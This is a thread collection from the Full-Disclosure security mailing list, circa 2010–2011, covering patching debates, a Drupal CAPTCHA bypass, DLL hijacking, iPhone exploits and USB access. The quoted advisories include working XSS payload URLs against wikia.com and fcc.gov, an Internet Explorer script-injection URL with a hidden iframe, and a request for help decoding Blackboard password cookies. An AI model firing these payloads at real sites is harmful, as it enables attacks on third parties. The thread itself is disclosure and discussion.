Why yes it does. Shame on me for not reading so well. On Feb 18, 2011 7:51 AM, Conor conor.l...@gmail.com wrote: I'm definitely not trying to defend MustntLive, but his timeline shows 2010.12.14 to 2011.02.16. Which makes it 2 months and 2 days, not 2 days, right? On Feb 18, 2011 7:08 AM, Charles Morris cmor...@cs.odu.edu wrote: ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vulnerability in reCAPTCHA for Drupal
fucking *two days*? Is that even enough time for the vendor to acknowledge? On Feb 17, 2011 9:20 AM, MustLive mustl...@websecurity.com.ua wrote: Hello list! I want to warn you about Insufficient Anti-automation vulnerability in reCAPTCHA for Drupal. In project MoBiC in 2007 I already wrote about bypassing of reCaptcha for Drupal (http://websecurity.com.ua/1505/). This is new method of bypassing reCaptcha for Drupal. - Affected products: - Vulnerable are all versions of reCAPTCHA plugin for Captcha module versions before 6.x-2.3 and 7.x-1.0. -- Details: -- Insufficient Anti-automation (WASC-21): In different forms in Drupal the vulnerable captcha-plugin reCAPTCHA is using. Drupal's Captcha module is vulnerable itself, so besides reCAPTCHA other captcha-plugins also can be vulnerable (at that this exploit is a little different from exploit for default Captcha module for Drupal). For bypassing of captcha it's needed to use correct value of captcha_sid, at that it's possible to not answer at captcha (captcha_response) or set any answer. This method of captcha bypass is described in my project Month of Bugs in Captchas (http://websecurity.com.ua/1498/). Attack is possible while this captcha_sid value is active. Vulnerabilities exist on pages with forms: http://site/contact, http://site/user/1/contact, http://site/user/password and http://site/user/register. Other forms where reCAPTCHA is using also will be vulnerable. Exploit: http://websecurity.com.ua/uploads/2011/Drupal%20reCAPTCHA%20bypass.html Timeline: 2010.12.11 - announced at my site. 2010.12.14 - informed reCAPTCHA developers. 2010.12.14 - informed Google (reCAPTCHA owner). 2011.02.16 - disclosed at my site. I mentioned about this vulnerability at my site (http://websecurity.com.ua/4752/). Best wishes regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vulnerability in reCAPTCHA for Drupal
Well, just playing devil's advocate here, mind you, I think much of the irritation from MustLive's postings comes from the following three reasons: 1.) MustLive is primarily a web-application specialist (for the sake of argument) 2.) The vulnerabilities he finds are of a class of vulnerabilities that are most common in his field. (Consider: someone searching for vulnerabilities in internet services directly and doing the binary analysis will primarily be finding buffer or stack overflows, right? In web security, XSS and SQL injection (as well as others I'm undoubtedly forgetting -- I am *NOT* counting not using a CAPTCHA here, see next item) are the most common vulnerabilities, given the lack of binary code to overwrite) 3.) Every so often he posts a vulnerability of questionable risk in the form of anti-automation which is essentially a fancy way of saying ha ha they don't use CAPTCHA. I don't consider that a vulnerability so much as an opening for annoyance; I suppose your mileage may vary. My guess is that there's a thought that web apps are far easier to crack at than binaries, so vulnerabilities are easier to find, therefore don't waste time finding something that's useless. That may be, in some cases, but sometimes a vulnerability in the web app destroys the entire chain, so to speak. Thoughts? -Zach (P.S. Still just playing devil's advocate; sometimes they get to annoy the crap out of me too.) On Thu, Feb 17, 2011 at 9:57 AM, Eyeballing Weev eyeballing.w...@gmail.comwrote: It's either he floods f-d with his vulnerabilities or he has to go out in the real world to farm dirt for export to the West. On 02/17/2011 12:54 PM, Zach C. wrote: fucking *two days*? Is that even enough time for the vendor to acknowledge? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] encrypt the bash history
Pretty much what the others said with the addition that if you can't trust root, you simply cannot trust *any* command on that machine, including gpg, since root can compromise them in many ways, too. Best bet is to download it every session and clear it -- but be warned that even any method used to clear it can have a trap that secretly backs it up, however unlikely. Bottom line -- either trust root or don't use the machine. Those are your options if you feel paranoid enough that you don't want root always watching you. It's worth pointing out, by the way, that there are ways of watching your program executions without using your bash history, like auditd for example. In fact, I was able to write a script to parse auditd logs out to do just that in a really easy-to-read way -- user (running as user2) ran /usr/bin/ssh with args: ssh user@host ... On Feb 6, 2011 6:18 AM, Emanuel dos Reis Rodrigues emanueldosr...@gmail.com wrote: ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [Full-Disclosure] http://security.goatse.fr/gaping-hole-exposed (is a troll)
At the risk of having the eyes of the spiteful turned on me... It's kind of funny how these sorts of groups seem to be governed by a pursuit of the lulz -- that is, personal amusement/schadenfreude at the expense of someone else, usually as a result of their own actions. But ironically, if Mr. Kaiser can be believed and judging by his overall tone of general irritation, it seems to be not quite so funny for the lulz-seekers when it happens to them. Although, to be honest, I think it's pretty funny. Kudos to trelane if he really did it; he's probably lulz enemy número uno now or something. On Jan 27, 2011, at 1:40 PM, Leon Kaiser litera...@gmail.com wrote: The person who did it was not a member of Goatse Security. It was a moron who thought that this would be funny. (The person in question is the guy who actually posted it on Full-Disclosure in the first place, Andrew Kirch) Leon Leon Kaiser - Head of GNAA Public Relations - litera...@gnaa.eu || litera...@goatse.fr http://gnaa.eu || http://security.goatse.fr 7BEECD8D FCBED526 F7960173 459111CE F01F9923 The mask of anonymity is not intensely constructive. -- Andrew weev Auernheimer On Thu, 2011-01-27 at 08:59 -0500, Kevin Lynn wrote: Knowing one of the people listed in the shout-outs, I told them about the props and they got back with the following statement: After doing some digging, [I] found out that they did it to their own website to generate publicity. The person responsible told me he didn't think anything would happen from it so he used my old nick. He apologized to me and said he'll not do something like that in the future. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Getting Off the Patch
Just on top of this, I would like to ask a question of Pete in the form of an example. Pete, let's say one of the assets I want to protect is the code for my site running on the web server. Now, let's say my web server has a serious bug that allows a given attacker to read the raw contents (i.e. code) of *any* file the web server has access to. In this circumstance, the web server still must be able to interact with these assets by reading and subsequently executing them for continued operations, but it is this very same vector that is being exploited by the attacker. Are there any controls, besides patching, that can be applied here without inhibiting current operations in any way? (Switching web servers not being an option for various reasons, even though that's where I would go first). -Zach On Jan 14, 2011, at 11:08 AM, Thor (Hammer of God) t...@hammerofgod.com wrote: [Combining Threads] -Original Message- From: Pete Herzog [mailto:li...@isecom.org] Sent: Friday, January 14, 2011 10:19 AM To: Thor (Hammer of God) Cc: valdis.kletni...@vt.edu; phocean; full-disclosure@lists.grok.org.uk; Zach C Subject: Re: [Full-disclosure] Getting Off the Patch It's brilliant! Where do I sign up? t What you run a patch management company? What's your problem with trying to improve the way we do things? If we find patching isn't a good nor necessary solution for better security then why shouldn't we propose a new model? No, I do not run a patch management company, but despite that, I successful patch on an ongoing basis without experiencing any of your claimed wastes of money, time, and resources. And within the context of this conversation, since you are the one saying that you don't have to patch, it should be you that illustrates a level of patch management expertise Coming up with some way of creating a dependency on new, additional security in depth requirements that on their own create additional administration in order to consciously stop patching is ridiculous Pete. If your controls are good enough to obviate the need for patching, then they should ALREADY BE in place, and part of the model which includes patching. This is why you are seeing the wtf is new or different about this? posts. merge Maybe you misunderstood this? If you need empirical evidence that patches change code then please do a diff yourself between two apps, one patched and one not. Here I was writing of the cost of functional testing and remediation of the operational security which scales exponentially as the operations scale. One doesn't need a server farm to prove as more servers are introduced into an operation that the number of connections between them grows. 2 servers each with 1 connection has 2. Add 2 more servers and now you have 4 servers but 8 connections to verify. And it goes on like that. If you don't do any testing and don't care then you don't have that work or money to lose with patching. But I said that already. The fact that patching changes code is a point so obvious that it doesn't need to made. What I asked for is empirical supporting your claim that your Get Off The Patch model actually saves time and money, while ensuring that your security is strong enough so that you can decide purposefully not to patch. Having a server farm to perform an ongoing cost analysis of the two models is absolutely required if you are going to present this idea to even the most basic of management personnel. When you go to management with a paradigm shift that will require clearance from legal, policy, engineering and development teams, you will have to show them a clear and unambiguous reduction in costs and risks that will justify the organization assuming the overall risk of not patching. When you make claims such as patching is a waste of money and that it causes costs to spiral exponentially, you are going to have to show that. I submit in this case that you can't provide that because you don't have it, and haven't done it. If the patching process truly is a budget-sucking, workflow blocking, administrative nightmare as you state, then the evidence of that fact should be trivial to illustrate. And nowhere in the model do you address the costs of the new model. You said, and I quote (which I probably don't have to say since I am actually using quotes), We find that that the right balance of operational controls at each interactive point within a vector can provide protection against 100% of the threats including unknown threats. How did your we find that? You found it HOW? This statement clearly states that YOU HAVE DONE THIS, but I'm confused as to why you would then respond with I don't need a server farm to prove this. You are stating that you have found a way to protect against 100% of threats, including unknown threats. That statement alone wins you a spot on The Wackiest
Re: [Full-disclosure] Getting Off the Patch
On Jan 13, 2011, at 10:56 AM, Pete Herzog li...@isecom.org wrote: Zach, Please allow me to strip away any opinion for a moment and focus on the facts which seem to be something we will agree on. 1. A patch when applied changes the source code. 2. Patches are released AFTER a flaw is reported. 3. A patch will fix one or more reported flaws in the code. 4. The means to absolutely verify the true source of the patch requires that your security has not already been compromised. 5. Evidence shows that patches, under the guise of security, have been used in the past as a means for a company to change the function of their product, remove content, or enforce licensing terms after it has been purchased and installed on the computer. 6. Patching alone, without operational controls, has not shown to protect systems or services consistently. Therefore using the facts, we can logically conclude the following: For every software, there are an unknown quantity of flaws. You protect the software with multiple varied controls to protect against flaws both reported and not. Seems logical; however... Therefore when you fix the flaw, you are only fixing a known and reported flaw. This does not protect you against the unknown, unreported flaws still existing and why you still need operational controls. So to say that you need to patch to fix a flaw ignores all the flaws you don't know about. While true, the patch is still most likely going to eliminate the flaw I *do* know about. I don't have either the connections or the time to find and know about some flaws that aren't covered by the patch, this is true; but I will know about the ones that are, and given my lack of connections, so do many other people, which increases the potential of exploitation (not the likelihood so much, but the potential). If I have the tools and the knowledge to fix a problem, I would figure that I would be remiss in not employing them merely because the other controls in place should keep my data safe. Especially if there is a direct interaction with what I'm patching and what I want to protect (website code apache, can't expect it to work and not be able to read/run my code and such). The tl;dr summary of that, I guess, is patching will at least keep the skiddies out. To fix each flaw in addition to adding controls adds new uncertainties both to the software and the operational controls and requires further verification testing to avoid surprise problems. A small change does not mean it's a small test. To ignore the functional testing after patching is to trust that the software maker knows your operations better than you, has your best interest in mind above their own profits, and that is if you can even be sure of where the patch came from. Potentially, yes. However, it's not exactly like patches I can somewhat trust can come from anywhere else (unless I wrote it), and if I continue to use the software I probably trust its author. It also takes substantial effort to evaluate switching products entirely as opposed to patching what you currently have, but that's just stating the obvious. Patch only because you can't control the interactions, can't stop the interactions, don't do any quality control or functionality testing anyway, or don't know if you've been already compromised anyway. Sincerely, -pete. All I'm really saying here is that controls external to what is weak are nice and definitely a recommendation, but ultimately can only mitigate what can be done. I'm saying it's generally worth it to patch for that extra assurance against well-known flaws -- but, granted, only especially so after a given period of time that sees many more and/or 'potentially fatal' flaws exposed to the public. Everything does make perfect sense though. -Zach On 1/11/2011 2:53 PM, Zach C wrote: Hmm. So you propose other measures of security as a way of circumventing the requirement of patching vulnerable software. That's nice, but it occurs to me that the vulnerable software is still vulnerable, and sandboxing (as you mentioned in an example) isn't always possible or feasible -- maybe it requires a code change, who knows. I see you mention the time it takes to test patches and their effect on your workflow, but I would figure an equal or greater amount of time would then need to be spent on other solutions as well -- and even when those other solutions are implemented, the software that you're doing all this to is still vulnerable, and likely in a way that such measures can't really prevent all that well (code theft, etc). Am I mistaken? I thought I got all that right. I haven't read the OSSTMM 3 yet, granted (it's on my to-do list), but I would think that it's still worth doing all that -- just that disregarding patches entirely in favor of this isn't the solution either, which is probably not what you're saying. :) On Jan 10, 2011
Re: [Full-disclosure] Getting Off the Patch
Hmm. So you propose other measures of security as a way of circumventing the requirement of patching vulnerable software. That's nice, but it occurs to me that the vulnerable software is still vulnerable, and sandboxing (as you mentioned in an example) isn't always possible or feasible -- maybe it requires a code change, who knows. I see you mention the time it takes to test patches and their effect on your workflow, but I would figure an equal or greater amount of time would then need to be spent on other solutions as well -- and even when those other solutions are implemented, the software that you're doing all this to is still vulnerable, and likely in a way that such measures can't really prevent all that well (code theft, etc). Am I mistaken? I thought I got all that right. I haven't read the OSSTMM 3 yet, granted (it's on my to-do list), but I would think that it's still worth doing all that -- just that disregarding patches entirely in favor of this isn't the solution either, which is probably not what you're saying. :) On Jan 10, 2011, at 11:41 AM, Pete Herzog li...@isecom.org wrote: Hi, Here's a new article on how and why you may want to stop patching your software and take a new approach to your security. So if patching is a tactic towards a particular security strategy, how can that be bad? I never said it was all bad. There are reasons where patching makes sense just like there are reasons to get a kick from a cup of coffee, get kicked by a shot of tequila, or spray stuff up your nose to breathe easier for 1.5 seconds. Yes, for the record, I am comparing patching to nasal spray. Read it here: https://www.infosecisland.com/blogview/10813-Getting-Off-the-Patch.html Sincerely, -pete. -- Pete Herzog - Managing Director - p...@isecom.org ISECOM - Institute for Security and Open Methodologies www.isecom.org - www.osstmm.org www.hackerhighschool.org - www.badpeopleproject.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] FreeBSD backdoor full disclosure
Trolls trolling trolls trolling trolls trolling trolls On Dec 28, 2010, at 4:32 PM, Paul Schmehl pschmehl_li...@tx.rr.com wrote: --On December 28, 2010 8:51:40 AM -0500 Григорий Братислава musntl...@gmail.com wrote: Is question: 'I is created code.c and I is release it. Paul Schmehl is come and take code.c and is backdoor it.' a) Is I to is blame? b) Is Schmehl responsible for is backdoor c) Is my whole developmenter team is responsible I is beginning to think musntlive is smelling *my* scrotum. How else is explain fixation? Paul Schmehl, If it isn't already obvious, my opinions are my own and not those of my employer. ** When intelligence argues with stupidity and bias, intelligence is bound to lose; intelligence has limits, but stupidity and bias have none. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Everyone loves wikia, so here have an xss against their site(s).
You would find an XSS against one of my favorite wikia wikis :( -Zach On Dec 21, 2010, at 5:33 PM, dave b db.pub.m...@gmail.com wrote: Everyone loves wikia, so here have an xss against their site(s). http://www.wikia.com/index.php?title=Special:Signuptype=loginaction=submitloginreturnto=Fal%22%3Cscript%3Ealert%28%27fail%27%29;%3C/script%3Elout_Wiki -- The lunatic, the lover, and the poet,Are of imagination all compact...-- Wm. Shakespeare, A Midsummer Night's Dream ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Saved XSS vulnerability in Internet Explorer
But it requires that the user/potential victim go to the URL and save it, you say? That doesn't quite seem realistic at all in terms of an attack... On Nov 14, 2010, at 9:56 AM, MustLive mustl...@websecurity.com.ua wrote: Hello Full-Disclosure! I want to warn you about Cross-Site Scripting vulnerability in Internet Explorer. This is Post Persistent XSS (Save XSS) (http://websecurity.com.ua/2641/). - Affected products: - Vulnerable versions are Internet Explorer 6 (6.0.2900.2180), Internet Explorer 7 (7.00.5730.13), Internet Explorer 8 (8.00.6001.18702) and previous versions. -- Details: -- This hole is similar to Cross-Site Scripting vulnerability in Internet Explorer (http://websecurity.com.ua/1241/) - CVE-2007-4478 (http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-4478). Which I found in August 2007 and informed Microsoft, and they ignored it and didn't fix it in IE6, and they didn't fixed it in IE7 (and also in IE6) after my informing in 2008. But they silently and lamerly fixed it in IE8, as I found in May 2010 when checked this hole in IE8. This vulnerability is different from previous one in that, that the attack is going not via saving web page, but saving web archive (mht/mhtml file) - similarly to Cross-Site Scripting in Opera (http://websecurity.com.ua/2555/), which I wrote about in 2008. All versions of IE6, IE7 and IE8 are affected to this hole. XSS (WASC-08): http://site/?--scriptalert(XSS)/script For the attack it's needed to visit such URL and save html page as mht/mhtml file (Web archive). For executing of the code it's needed that file was saved not with mht or mhtml extension, but with htm or html extension. After that when opening saved page in any browser the code will run. Attacking code are saving inside of the file. This vulnerability - it's Saved XSS and Local XSS (http://websecurity.com.ua/4219/). To make hidden attack an iframe can be used in code of the page: iframe src='http://site/?--scriptalert(XSS)/script' height='0' width='0'/iframe Timeline: 2010.11.12 - found vulnerability. 2010.11.12 - disclosed at my site. 2010.11.13 - informed Microsoft. I mentioned about this vulnerability at my site (http://websecurity.com.ua/4677/). Best wishes regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] All the md5 hashes in every single update message sent to this list
They do this so that people who are manually installing or updating software can also verify that the package they are installing is, in fact, the exact same one that the software packager released -- this reduces (but not eliminates) the chance that someone malicious may have been able to slip something into the update package unnoticed by the installer or the packager. On Fri, Oct 15, 2010 at 11:22 PM, B1towel b...@b1towel.com wrote: What is the purpose of all the patch notification emails that when a security vulnerability is fixed the people who send out the notification email include a 5 mile long list of md5 hashes for every single package and all dependancies for the package that was updated? I feel that information does not need to be in the notification that the latest version fixed a security vulnerability, and to me it just gets in the way of reading the occasionally useful content this list has to offer. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] gDoc Fusion version 2.5.1 = Insecure DLL Hijacking Vulnerability (wintab32.dll, ssleay32.dll)
tl;dr everything is vulnerable to dll hijacking zomg we are all going to be pwned. Ye gods these are irritating. I suppose I should filter them but damn. On Sep 12, 2010, at 3:53 PM, YGN Ethical Hacker Group li...@yehg.net wrote: 1. OVERVIEW The gDoc Fusion application is vulnerable to Insecure DLL Hijacking Vulnerability. Similar terms that describe this vulnerability have been come up with Remote Binary Planting, and Insecure DLL Loading/Injection/Hijacking/Preloading. 2. PRODUCT DESCRIPTION gDoc Fusion makes it simple and quick to compile a single document from multiple different PC files. Just drag the documents--presentations, spreadsheets, written documents, images, PDF, and more than 200 other file types--into Fusion; flip through them quickly with FlickView browser; pick the pages you want and arrange them in any order you like; if you wish, add comments, make small text edits, or redact information; and Save the finished documents in either Word or PDF format. You don't have to do any formatting or conversion--gDoc Fusion handles it all for you. Also includes free ultilty for multi-format document viewing and PDF creation. 3. VULNERABILITY DESCRIPTION The gDoc Fusion application passes an insufficiently qualified path in loading its external libraries - wintab32.dll, ssleay32.dll when a user opens its associated file with extensions - dwfx, jtx, pdf, xps . 4. VERSIONS AFFECTED 2.5.1 and probably lower versions 5. PROOF-OF-CONCEPT/EXPLOIT http://core.yehg.net/lab/pr0js/advisories/dll_hijacking/gdocfusion/poc/movie/gdocfusion_2.5.1-dll-hijacking.mp4 http://core.yehg.net/lab/pr0js/advisories/dll_hijacking/gdocfusion/poc/gdocfusion_2.5.1-dll-hijacking-poc.zip Tested Platform: Windows XP Service Pack 3 (Fresh Windows) 6. IMPACT Attackers can trigger a successful exploit against a victim user in a number of ways such as placing a malicious external library file made as hidden attribute and a seemingly interesting file in network shares, usb drives, file sharing networks, social networks, ..etc 7. SOLUTION Fixed version from the vendor has not been released yet. However, it is suggested that the following workarounds be deployed by users to protect increasing mass exploitation of this vulnerability class: - Disable loading of libraries from WebDAV and remote network shares - Disable the WebClient service Please see workaround solution links in References section. 8. VENDOR Global Graphics Software Ltd. http://www.globalgraphics.com/en/gdoc/gdoc-fusion 9. CREDIT This vulnerability was discovered by Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 10. DISCLOSURE TIME-LINE 09-13-2010: notified vendor 09-13-2010: vulnerability disclosed 11. REFERENCES Original Advisory URL: http://core.yehg.net/lab/pr0js/advisories/dll_hijacking/[gdocfusion]_2.5.1_insecure_dll_hijacking Workaround Solution: http://support.microsoft.com/kb/2264107 Workaround Solution: https://www.microsoft.com/technet/security/advisory/2269637.mspx#EGF Developer Solution: http://msdn.microsoft.com/en-us/library/ff919712%28v=VS.85%29.aspx Unofficial DLL Hijacking List: http://www.corelan.be:8800/index.php/2010/08/25/dll-hijacking-kb-2269637-the-unofficial-list/ Testing for DLL Hijacking: http://core.yehg.net/lab/pr0js/view.php/when_testing_for_dll_hijacking.txt #yehg [09-13-2010] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] On the iPhone PDF and kernel exploit
According to some of comex's tweets, the exploits he used are public; I also saw one person on Slashdot explain that root was granted via an IOSurface allocation error, while other sources claim part of the Spirit jailbreak was reused in Star. And then, of course, is the PDF exploit (that crashed Okular too when I tried to read one for shits and giggles -- yeah, not the brightest bulb, I know...). But you are absolutely right in stating that it really is just as dangerous as it would be if the iPhone were a personal computer or somesuch instead (by intention :)). Remote root is remote root, and it is especially scary how it totally trashes every security measure put in place. Normally with this sort of thing I would suppose disclosure ethics would apply, and perhaps they still do, but at the same time, as you said, revealing the exploits makes it that much easier for Apple to find and patch them in the next release, which is both bane and boon. The next revision would be more secure at the expense of the user's freedom. Hell, the next revision will probably have at least part of this patched anyway just out of Apple's commitment to the walled garden. However... This particular exploit is only in binary form, and there is no official explanation yet. One usually comes after Apple has patched the flaw (as in responsible (I think it's called?) disclosure). Until then, it's likely that only those skilled in analyzing this sort of thing have any idea at all what Star does -- most of the script kiddies are just using it to jailbreak. Sent from my iPhone On Aug 4, 2010, at 5:01 AM, Marcello Barnaba (void) v...@openssl.it wrote: For the first time in my life, a 0-day exploiting remote code execution, sandbox escaping and privilege escalation has been packaged for general user consumption via a web site ( http://jailbreakme.com ). The actual pdf exploit can be downloaded here: http://jailbreakme.com/_/. What puzzles me is.. no notices here on FD, no info on Bugtraq, no CVE, no press release by the CERT, as of now. The cat mouse game played by the iPhone dev team and Apple is done to liberate our devices from useless restrictions, but the whole point for them to exist is because said devices live in a walled garden, that is really useful only to the company behind it. I've posted more thougths and the few technical details I was able to gather (from a tweet!) here: http://sindro.me/2010/8/4/on-the-iphone-pdf-and-kernel-exploit What do you think? Did someone reverse engineer the exploit? ~Marcello -- ~ marcello.barn...@gmail.com ~ http://www.linkedin.com/in/marcellobarnaba ~ http://sindro.me/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Day of bugs in WordPress 2
So if Drupal and WordPress, etc. are so terrible, what would you all recommend? -Zach On Jul 29, 2010, at 4:16 PM, coderman coder...@gmail.com wrote: On Thu, Jul 29, 2010 at 3:05 PM, Christian Sciberras uuf6...@gmail.com wrote: ... Please! Don't put Drupal and decent in the same sentence! when the bar is wordpress, .. well, you get the picture. (those modules though, most could use regular scrubbing) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] blackboard
Wait, did you even try and replay them yet? On Fri, May 28, 2010 at 7:22 PM, Justin Chang ktriv...@msn.com wrote: What are the encoded_pw and encoded_pw_unicode cookies in blackboard? These are passed clear text with username and I am trying to see if I can get the password from this encoded_pw=89105107B8048EB7C8D744EE84C12A1Eencoded_pw_unicode=13D0F95489DAA8A9DC1D2B9E975F97B0 Help appreciated Thanks ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] fcc.gov XSS
There seem to be a few more problems with that script than just that XSS... For example, going to the Application Search page root (the page that takes you to that one, presumably) and selecting literally everything in the Services listbox will net you an error reporting Incorrect syntax near ',' for server 'HEIMDAL'. It apparently occurs on line 4. I dunno. I'm not gonna mess around with it too much though :) On Mon, May 24, 2010 at 12:58 AM, Marshall Whittaker marshallwhitta...@gmail.com wrote: FCC.gov XSS --- CODE --- http://fjallfoss.fcc.gov/cgi-bin/ws.exe/prod/cdbs/pubacc/prod/leg_det.pl?Application_id=1186791File_number=%3Cscript%20language=%22javascript%22%20type=%22text/javascript%22%3Ealert('h4x0r3d');%3C/script%3Ehttp://fjallfoss.fcc.gov/cgi-bin/ws.exe/prod/cdbs/pubacc/prod/leg_det.pl?Application_id=1186791File_number=%3Cscript%20language=%22javascript%22%20type=%22text/javascript%22%3Ealert%28%27h4x0r3d%27%29;%3C/script%3E --- CODE --- --oxagast ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] iPhone data protection flaw
The iPhone uses proprietary protocols over USB for file operations, syncing and the like -- only real authentication that I can recall (and I got it working to begin with ;)) was that the session with lockdownd (kind of a broker for starting services, etc.) eventually goes SSL... there is also device pairing but it is really trivial to do and doesn't restrict the computer at all. Just so happens that Lucid Lynx might include libimobiledevice, ifuse/gvfs-afc and all the necessary components now. :) But yes, as another poster mentioned, you're jailed to your Media directory unless jailbroken and connecting to afc2. Sent from my Android phone On May 17, 2010 3:35 AM, Bernd Marienfeldt be...@linx.net wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Hello, I've recently upgraded to Ubuntu Lucid Lynx (10.04 LTS) and been surprised by the iPhone 3GS (3.1.3 - 7E18) mounting behavior: Fully switch off the iPhone 3GS and then connect it to the Lucid Lynx PC via USB, the phone turns on and will be automatically mounted without any authentication challenge (PIN), allowing read/write access to your various local data, e.g. purchases, DCIM, Downloads, Photos, Recordings etc. Obviously there are other flaws discovered, see [1] which might be even worse depending on your security policy and requirements. Can people confirm same behavior with other iPhone models and OS's ? Cheers Bernd [1] http://marienfeldt.wordpress.com/2010/03/22/iphone-business-security-framework/ or http://tinyurl.com/yyjpfbn - -- Bernd Marienfeldt (Information Security Officer LINX) London Internet Exchange Ltd. Trinity Court, Peterborough, PE1 1DA Registered England and Wales number 3137929 -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.10 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEYEARECAAYFAkvxGlYACgkQuhj/IfS3mc5XegCg6Sh5Twpd/hmsigKBDOPyxU5e +i4AoNBuLuJKrBkYyK6G/MD+s5PMD5XC =9PPI -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] iPhone data protection flaw
Truly? Wait, are you going through AFC or some other way? It was my understanding that iPhone internal storage never comes up any other way... Doesn't lockdownd require that your computer be paired before even going SSL to start services? On May 18, 2010 4:23 PM, Thor (Hammer of God) t...@hammerofgod.com wrote: Actually, no. It doesn't have to pair to read and write to internal storage. You only have access to the pictures dir and other files they may have put on the external storage section, but you can plug it into any system that has drivers and access it. t -Original Message- From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-... ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/